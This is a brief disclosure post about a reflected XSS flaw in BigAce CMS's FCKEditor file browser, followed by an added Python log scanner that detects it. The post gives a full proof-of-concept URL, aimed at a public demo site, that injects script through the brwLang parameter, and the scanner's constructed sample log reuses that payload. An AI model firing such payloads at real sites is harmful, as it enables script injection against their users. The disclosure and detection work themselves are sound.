BigAce <= 2.7.8 FCKEditor XSS vulnerability

I was looking for a CMS and I found this one that seems really good, but after 10 minutes I found an XSS vulnerability in the FCKEditor plugin.

Update FCKEditor…

 

LIVE DEMO:

h**p://demo.opensourcecms.com/bigace/addon/FCKeditor/editor/filemanager/browser/bigace/browser.php?brwLang=%3C/script%3E%27%3Cscript%3Ealert%2812345%29%3C/script%3E
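A defender-side check for this issue, as an added example that is not from the original post or from the BigAce or FCKeditor code: it scans web access-log lines for requests to the `browser.php` connector whose `brwLang` value is not a plain language code. The allowlist pattern, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: brwLang is only meant to carry a short language code ("en", "pt-BR").
LANG_CODE = re.compile(r"[A-Za-z]{2,3}(?:[-_][A-Za-z0-9]{2,8})*")
# Path suffix of the connector, taken from the URL in the post.
BROWSER_PATH = "/filemanager/browser/bigace/browser.php"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %253C) so the check sees the final text."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_brwlang(log_line):
    """Return decoded brwLang values in this log line that are not language codes."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith(BROWSER_PATH):
        return []
    values = [fully_decode(v) for v in parse_qs(url.query).get("brwLang", [])]
    return [v for v in values if not LANG_CODE.fullmatch(v)]

def scan(lines):
    """Return (line_number, value) pairs for every unexpected brwLang value."""
    return [(n, v) for n, line in enumerate(lines, 1) for v in suspicious_brwlang(line)]

def make_line(target):
    # Constructed access-log line in Common Log Format (documentation IP address).
    return f'203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'

CONNECTOR = "/bigace/addon/FCKeditor/editor" + BROWSER_PATH
SAMPLE_LOG = [  # constructed sample input; line 2 reuses the query string from the post
    make_line(CONNECTOR + "?brwLang=en"),
    make_line(CONNECTOR + "?brwLang=%3C/script%3E%27%3Cscript%3Ealert%2812345%29%3C/script%3E"),
    make_line(CONNECTOR + "?brwLang=%253C/script%253E"),  # double-encoded variant
    make_line(CONNECTOR + "?brwLang=pt-BR"),
    make_line("/index.php?brwLang=%3Cb%3E"),  # different script, not the connector
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: unexpected brwLang value {value!r}")
```

The same allowlist can be applied server-side to reject the request before the value is written into the page.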

 

 
